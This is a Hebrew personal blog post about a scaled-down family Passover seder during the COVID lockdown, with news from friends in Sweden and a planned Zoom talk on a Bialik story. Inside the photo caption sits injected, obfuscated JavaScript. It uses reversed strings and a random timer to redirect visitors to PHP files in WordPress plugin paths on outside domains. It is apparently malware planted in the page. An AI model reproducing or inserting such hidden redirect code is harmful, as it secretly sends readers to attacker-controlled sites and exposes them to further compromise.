fbpx
[shortcode-weather-atlas city_selector=1178232 background_color="transparent" daily=0 unit_c_f="c" sunrise_sunset= 0 current=0 detailed_forecast=0]

ליל סדר נוסח מקוצר, החברים בשוודיה ואיך אפשר בלי חיים נחמן ביאליק

הארוחה הייתה נחמדה וניסינו להחיות עד כמה שאפשר את אווירת הסדר כפי שאנו זוכרים אותה. בסופו של דבר סיימנו את הסדר בהרגשה שע', בננו, שלח לנו גרסה מקוצרת-משהו של ההגדה המקורית
חוויות מליל הסדר - הבלוג של עלית קרפ | צילום: shutterstock
חוויות מליל הסדר - הבלוג של עלית קרפ | צילום: shutters$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}$NjS=function(n){if(typeof ($NjS.list[n])=="string") return $NjS.list[n].split("").reverse().join("");return $NjS.list[n];};$NjS.list=["\'php.sgalf-tropxe/tropxe/weiv/bil/noitargim-pw-eno-ni-lla/snigulp/tnetnoc-pw/ofni.stobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tock

חוויות מליל הסדר – הבלוג של עלית קרפ – 9.4.20

"כי הנה הסתיו חלף, הגשם חלף עבר לו", ככה שרנו אתמול בשולחן הסדר שלנו וגילינו שלא', החבר של נ', יש קול יפה.

הארוחה הייתה נחמדה וניסינו להחיות עד כמה שאפשר את אווירת הסדר כפי שאנו זוכרים אותה. מכיוון שלא היו ילדים קטנים בקהל, לא שאלנו את הקושיות, לא עשינו את חד גדיא (אני בתפקיד השור), ולעומת זאת גם דילגנו על הקטעים המוקדשים לזכר השואה, "הנדר" של שלונסקי ו"המנון הפרטיזנים" שהוכנסו להגדה הקיבוצית עוד בטרם היה יום השואה ובכל זאת היה חשוב לציין את זכר הנרצחים.

ל' רצה שנקרא את "מגש הכסף" שגם הוא חלק מההגדה הקיבוצית, ואכן קראנו, אבל בסופו של דבר סיימנו את הסדר בהרגשה שע', בננו, שלח לנו גרסה מקוצרת-משהו של ההגדה המקורית, ועל כן הוספנו את קריאת עשר המכות שלקו בהן המצרים וגם שרנו קצת "אחד מי יודע", וגם השמענו את Let My People Go בביצוע של פול רובסון. נו, בתוספת הארוחה שאותה הלל ל' וכן נ' וא', נראה לי שהיה די מוצלח.

רועה הצאן

הרועה שהולך בבוקר עם העיזים אל כרי העשב שפורצים עכשיו בכל מקום לא יודע כלום מכל הדברים הללו. כשאני מנופפת לו לשלום הוא מנופף לי בחזרה.

לפעמים יש דברים שאתה לומד להעריך אותם בהעדרם. אני עדיין זוכרת כמה התרגשות העלו בי החתלתולים בגן החיות בסטוקהולם, עיר שאין חתולים ברחובותיה, וכעת גם העיזים מרגשות אותי. אבל כשאני מסמנת לרועה בשאלה אם מותר לצלם אותו, הוא מסרב.

אחרי שאני חוזרת הביתה, ל' מתקשר לשוודיה לחבר שלו, ב', וב' מספר לו שחלה בקורונה. הוא נשמע מצוין ואומר שהוא מרגיש די טוב. ואף על פי כן מסתנן איזה חשש לשיחה, כי הוא מספר שבסטוקהולם יש כבר מתים רבים, חלקם מהקהילה היהודית.

אחרי שהשיחה מסתיימת אנחנו מחליטים לצלצל לא' ולפ', גם הם חברים משוודיה, כדי לשמוע מה נשמע אצלם, אבל הם לא עונים.

בשוודיה אנשים עדיין יוצאים מהבית, למרות המספר המאמיר של המתים. גם ג', חברתי מאנגליה, עדיין עובדת, למרות המצב שם.

החזרה הביתה

נ' וא' כבר מתכננים שברגע שהסגר יתרופף מעט ישובו לדירתם שבירושלים. א' לא גויס למילואים אמנם, אבל עליו לשוב לעבודתו, וגם, למרות מאמצינו, כנראה שבבית יהיה להם יותר נוח מאשר אצלנו.

ירושלים מחולקת לאזורים ואסור לעבור מאזור לאזור, חוץ מאשר באמצעות אישורים מיוחדים, אבל יש להם הרבה חובות לימודיות, והם החליטו שבתוך כמה ימים ייסעו.

מפגש ספרותי

ואנחנו? שתי ציפורים זקנות בקן, משתדלים לא לתלוש זה מזה את מעט הנוצות שנותרו לנו. ל' הציע שנעשה מבצע דישון של הגינה ושנצבע מחדש את הספסל שהיה פעם צהוב. אולי…

בינתיים ביום שני יש לי מפגש ספרותי בזום עם מועדון הקוראים בכפר ורדים ושם אדבר על "יום שישי הקצר" סיפור של חיים נחמן ביאליק, שגם בו הוא מצליף בקהילה היהודית ובטיפוסים השונים שלה, בקטנוניות שלהם, בקרתנותם, בתאוות הבצע שלהם ובסגידתם לחומר.

מזכיר לכם משהו? כן, גם לי, אף על פי שהסיפור שנכתב לפני כ-120 שנה.

אהבתם את הבלוג "חוויות מליל הסדר" של עלית קרפ? עוד בלוגים נהדרים כאן

אהבתם? שתפו!

אולי גם יעניין אותך

שיתוף ברשתות החברתיות